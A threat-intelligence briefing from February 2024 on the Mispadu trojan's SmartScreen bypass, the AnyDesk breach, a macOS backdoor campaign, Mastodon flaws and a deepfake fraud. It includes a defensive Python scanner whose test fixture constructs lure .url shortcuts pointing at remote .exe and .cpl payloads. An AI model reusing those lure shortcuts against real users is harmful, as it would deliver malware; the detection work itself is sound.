Cyware Daily Threat Intelligence


Daily Threat Briefing February 5, 2024

Windows users in Mexico are in the sights of cybercriminals planting a new variant of the Mispadu banking trojan on their devices. The malware, part of the LATAM banking malware family, is being delivered through malicious internet shortcut (.url) files packaged inside ZIP archives. Account takeover is also a risk for a popular decentralized social network owing to a flaw rated 9.4 on the CVSS severity scale; full details will be withheld until February 15 to give admins time to patch.

Meanwhile, security researchers warned of a large-scale macOS campaign distributing the Activator backdoor through cracked copies of popular software. Its multistage infection chain leaves the backdoor in place even if the user removes the cracked application.

Top Breaches Reported in the Last 24 Hours

Children's hospital thrown offline

Lurie Children's Hospital in Chicago took its IT systems offline following a cyberattack. The incident affected internet, email, and phone services as well as access to the MyChart patient portal. Although the hospital remains open and focused on patient care, the disruption has delayed scheduled procedures, made some medical test results unavailable, and interfered with prescription processing.

AnyDesk’s production systems compromised

German company AnyDesk Software GmbH confirmed a security breach in which its production systems were compromised. The company has already revoked all security-related certificates and plans to revoke the code signing certificate previously used for its binaries, replacing it with a new one; users should expect updated builds signed with the new certificate and verify the signer before installing. AnyDesk is also recommending, as a precaution, that users change their passwords for its web portal. The company said there is no evidence that any end-user devices have been affected.

Top Malware Reported in the Last 24 Hours

Banking trojan abuses SmartScreen bypass flaw

A new variant of the Mispadu banking trojan is abusing an already-patched Windows SmartScreen security bypass flaw. The attacks begin with phishing emails carrying ZIP archives that contain rogue internet shortcut (.url) files; opening the shortcut exploits CVE-2023-36025 in Windows SmartScreen, which Microsoft patched in November 2023, so the referenced payload runs without the warning SmartScreen would normally show. Mispadu is known for selectively targeting victims based on geographic location and system configuration. Endpoints that have not applied the November 2023 update remain exposed, and .url attachments arriving inside archives are worth blocking at the mail gateway regardless of patch status.
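As an added example (not code from the briefing or from any vendor report), the following Python scans a ZIP archive for .url internet shortcuts whose target points at a file on a remote share, which is the shape of lure that publicly reported CVE-2023-36025 abuse relies on. The archive contents, host addresses and file names are constructed here for illustration, and the list of executable extensions is an assumption rather than a complete catalogue.

```python
"""Flag Windows internet shortcut (.url) files inside a ZIP archive that point
at a payload on a remote share, the lure pattern behind CVE-2023-36025 abuse.

Added example; not code from Cyware or from any vendor report. All sample
data below is constructed for illustration.
"""
import io
import re
import zipfile
from typing import Optional
from urllib.parse import urlparse

# File types an attacker would want launched from a shortcut.
# Assumption: illustrative list, not a complete catalogue.
EXECUTABLE_EXTS = {".exe", ".dll", ".cpl", ".scr", ".msi", ".vbs",
                   ".js", ".hta", ".bat", ".cmd", ".ps1"}

# Matches a UNC path such as \\192.0.2.11\share\payload.cpl and captures the host.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_url_shortcut(data: bytes) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    text = data.decode("utf-8", errors="replace")
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and line.lower().startswith("url="):
            return line[4:].strip()
    return None


def classify_target(url: str) -> list[str]:
    """Return the reasons a shortcut target looks like a remote-payload lure.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    unc = UNC_RE.match(url)
    if unc:
        # Plain UNC path: Windows resolves it over SMB to a remote host.
        reasons.append(f"UNC path to remote host {unc.group(1)}")
        target = url
    else:
        parsed = urlparse(url)
        # file:// with a host component also reaches out over SMB/WebDAV;
        # file:///C:/... has no host and is a local reference.
        if parsed.scheme == "file" and parsed.netloc:
            reasons.append(f"file:// URL with remote host {parsed.netloc}")
        target = parsed.path
    # Extension of the final path component, whichever separator was used.
    name = re.split(r"[\\/]", target)[-1]
    ext = ("." + name.rsplit(".", 1)[1].lower()) if "." in name else ""
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"target is an executable type ({ext})")
    return reasons


def scan_zip(archive: bytes) -> dict[str, list[str]]:
    """Map each suspicious .url entry in the archive to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            url = parse_url_shortcut(zf.read(info))
            if url is None:
                findings[info.filename] = ["malformed: no URL= in [InternetShortcut]"]
                continue
            reasons = classify_target(url)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Build an in-memory ZIP shaped like a lure (constructed data, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Factura_0234.url",
                    "[InternetShortcut]\r\nURL=file://192.0.2.10@80/docs/Factura_0234.exe\r\n"
                    "IconIndex=0\r\n")
        zf.writestr("Comprobante.url",
                    "[InternetShortcut]\r\nURL=\\\\192.0.2.11\\share\\Comprobante.cpl\r\n")
        zf.writestr("Benign.url",
                    "[InternetShortcut]\r\nURL=https://example.com/invoice\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in scan_zip(build_sample_archive()).items():
        print(entry, "->", "; ".join(why))
```

A shortcut whose URL= names a remote host via file:// or a UNC path is the key signal; the executable-extension check is supporting evidence, since an ordinary https link to a web page produces no finding.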

Large-scale campaign delivers macOS backdoor

Security researchers uncovered a campaign that uses cracked copies of popular macOS software to distribute the Activator macOS backdoor. The campaign stands out for its scale, its multistage payload delivery, and the threat actor's choice of cracked macOS apps with titles likely to interest business users. The actor employed as many as 70 unique cracked macOS applications to distribute the malware, and removing the cracked app does not remove the backdoor it installed.

Top Vulnerabilities Reported in the Last 24 Hours

Mastodon patches high-severity bugs

The decentralized social media platform Mastodon addressed high-severity vulnerabilities discovered in a Mozilla-requested security audit conducted by German pentesting firm Cure53. The first flaw lies in Mastodon's media processing code: an attacker could use specially crafted media files to create or overwrite arbitrary files on the server, potentially leading to a DoS condition or RCE. The second flaw is an HTML sanitization bypass that allowed malicious markup into link preview cards, providing a vector for XSS payloads.

Top Scams Reported in the Last 24 Hours

Firm lost $25.5 million to deepfake scam

Scammers stole HK$200 million (approximately $25.5 million) from the Hong Kong office of a multinational company by using a deepfake video call to deceive an employee into transferring the funds. The attackers built deepfake versions of the meeting participants from publicly available footage of the company's staff. The employee made the transfers during the call, believing he was speaking with the company's CFO and other colleagues. Video and voice alone are no longer reliable proof of identity; high-value transfer requests should be confirmed through a separate, pre-agreed channel before funds move.
